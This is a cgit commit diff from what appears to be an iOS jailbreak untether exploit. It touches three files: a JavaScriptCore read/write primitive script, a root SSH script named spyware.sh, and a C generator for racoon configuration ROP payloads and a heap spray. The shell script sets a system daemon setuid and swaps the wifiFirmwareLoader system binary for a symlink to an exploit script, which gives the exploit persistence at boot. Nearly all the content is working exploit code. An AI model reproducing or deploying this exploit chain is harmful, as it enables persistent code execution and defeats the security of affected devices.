summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--js/main.js4
-rwxr-xr-xspyware.sh8
-rw-r--r--src/main.c94
3 files changed, 41 insertions, 65 deletions
diff --git a/js/main.js b/js/main.js
index 7a4a449..efb1f5f 100644
--- a/js/main.js
+++ b/js/main.js
@@ -49,7 +49,7 @@ function main() {
var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
var shc_slide = read_u32(0x1a0000 + 20 + slid);
- write_str(0x148000, "get rekt from jsc %d\0");
+ write_str(0x148000, "get rekt from jsc %d (slide=%x)\0");
write_str(0x149000, "syslog\0");
write_str(0x14a000, "sleep\0");
// while (true) {
@@ -59,7 +59,7 @@ function main() {
var i = 0;
while (true) {
- call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, 0x3);
+ call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
i++;
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
diff --git a/spyware.sh b/spyware.sh
index fb79486..dac5939 100755
--- a/spyware.sh
+++ b/spyware.sh
@@ -3,7 +3,7 @@
ssh root@localhost -p 2222 << EOF
rm -rf /untether/
mkdir /untether/
-echo "#!/usr/local/bin/scripter -q -cf" > /untether/get_code_exec
+echo "#!/usr/local/bin/scripter_ -q -cf" > /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
@@ -32,8 +32,8 @@ echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec
echo "execute(\"/untether/get_code_exec\");" >> /untether/get_code_exec
chmod +x /untether/get_code_exec
mkdir /usr/local/bin/
-cp -p /usr/libexec/dhcpd /usr/local/bin/scripter
+cp -p /usr/libexec/dhcpd /usr/local/bin/scripter_
chmod 4777 /usr/sbin/racoon
-mv /usr/sbin/BTServer /usr/sbin/BTServer_
-ln -s /untether/get_code_exec /usr/sbin/BTServer
+mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_
+ln -s /untether/get_code_exec /usr/libexec/wifiFirmwareLoader
EOF \ No newline at end of file
diff --git a/src/main.c b/src/main.c
index 218f6ea..c3df450 100644
--- a/src/main.c
+++ b/src/main.c
@@ -176,7 +176,8 @@ int main(int argc,
// uint32_t stack_base = 0x1c7738; // my shell setup
// uint32_t stack_base = 0x1c7c88; // my 4s shell setup
// uint32_t stack_base = 0x1c2e48; // my lldb
- uint32_t stack_base = 0x1c7d68; // btserver env
+// uint32_t stack_base = 0x1c7d68; // btserver env
+ uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env
uint32_t magic_trigger_addr = 0xb6074;
uint32_t mov_r0_0_bx_lr = 0x8d3e | 1;
@@ -297,6 +298,39 @@ int main(int argc,
write32_unslid(0x41414141,
0x42424242));
#endif
+
+ fprintf(fp,
+ "%s",
+ writebuf_unslid(0x108000,
+ "var parent = new Uint8Array(0x100);"
+ "var child = new Uint8Array(0x100);"
+ " var fuck = new Array();"
+ " for (var i = 0; i < 0x200000; i++) {"
+ " fuck[i] = i;"
+ " }"
+ " delete fuck;"
+ ""
+ "//shitalloc();",
+ strlen("var parent = new Uint8Array(0x100);"
+ "var child = new Uint8Array(0x100);"
+ " var fuck = new Array();"
+ " for (var i = 0; i < 0x200000; i++) {"
+ " fuck[i] = i;"
+ " }"
+ " delete fuck;"
+ ""
+ "//shitalloc();") + 1));
+ fprintf(fp,
+ "%s",
+ writebuf_unslid(0x10a000,
+ js_src,
+ strlen(js_src) + 1));
+
+ fprintf(fp,
+ "%s",
+ writebuf_unslid(0x109000,
+ "still alive\n",
+ strlen("still alive\n") + 1));
for (int slide = 0x1; slide <= 0x3; slide++) {
uint32_t base = slide << 12;
@@ -320,30 +354,6 @@ int main(int argc,
"[*] malloc(...)\t\t\t= %p\n",
strlen("[*] malloc(...)\t\t\t= %p\n") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + dyld_status_addr,
- "[*] dyld_base\t\t\t= %p\n",
- strlen("[*] dyld_base\t\t\t= %p\n") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + dyld_status2_addr,
- "[*] *(uint32_t*)dyld_base\t= %p\n",
- strlen("[*] *(uint32_t*)dyld_base\t= %p\n") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + jsc_addr,
- "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore",
- strlen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(base + dlopen_status_addr,
- "[*] dlopen(JavaScriptCore)\t= %p\n",
- strlen("[*] dlopen(JavaScriptCore)\t= %p\n") + 1));
fprintf(fp,
"%s",
writebuf_unslid(base + dyld_shc_status_addr,
@@ -359,40 +369,6 @@ int main(int argc,
writebuf_unslid(base + arg_addr,
"/untether/p0laris",
strlen("/untether/p0laris") + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(0x108000,
- "var parent = new Uint8Array(0x100);"
- "var child = new Uint8Array(0x100);"
- " var fuck = new Array();"
- " for (var i = 0; i < 0x800000; i++) {"
- " fuck[i] = i;"
- " }"
- " delete fuck;"
- ""
- "//shitalloc();",
- strlen("var parent = new Uint8Array(0x100);"
- "var child = new Uint8Array(0x100);"
- " var fuck = new Array();"
- " for (var i = 0; i < 0x800000; i++) {"
- " fuck[i] = i;"
- " }"
- " delete fuck;"
- ""
- "//shitalloc();") + 1));
- fprintf(fp,
- "%s",
- writebuf_unslid(0x10a000,
- js_src,
- strlen(js_src) + 1));
-
- fprintf(fp,
- "%s",
- writebuf_unslid(0x109000,
- "still alive\n",
- strlen("still alive\n") + 1));
-
rop_chain_shit chain_b0i = gen_rop_chain(base,
we_out_here_addr,
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 23:49:47 +0000